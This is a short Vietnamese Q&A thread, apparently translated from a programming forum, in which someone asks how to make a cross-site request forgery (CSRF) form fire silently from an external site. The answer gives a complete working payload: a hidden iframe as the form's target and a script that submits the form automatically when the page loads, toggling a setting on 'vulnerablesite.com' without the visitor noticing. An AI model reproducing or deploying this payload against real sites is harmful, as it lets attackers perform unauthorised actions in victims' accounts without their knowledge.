Ví dụ về việc gửi một biểu mẫu POST (CSRF) một cách âm thầm

Question

Tôi quan tâm đến việc biết cách gửi biểu mẫu POST cho CSRF một cách âm thầm mà không có bất kỳ thông báo nào (vị trí tài liệu được chuyển hướng đến URL đã đăng ký không phải là im lặng).

Ví dụ:

<form method='POST' action='http://vulnerablesite.com/form.php'> 
<input type='hidden' name='criticaltoggle' value='true' 
<input type='submit' value='submit'> 
</form> 

Trên một trang web bên ngoài, những gì tôi sẽ cần phải làm gì để kích hoạt hình thức này sẽ tự động và âm thầm?

Answer 1

Một giải pháp sẽ được mở hành động của hình thức trong một khung như một iframe:

<iframe style="display:none" name="csrf-frame"></iframe> 
<form method='POST' action='http://vulnerablesite.com/form.php' target="csrf-frame" id="csrf-form"> 
    <input type='hidden' name='criticaltoggle' value='true'> 
    <input type='submit' value='submit'> 
</form> 
<script>document.getElementById("csrf-form").submit()</script>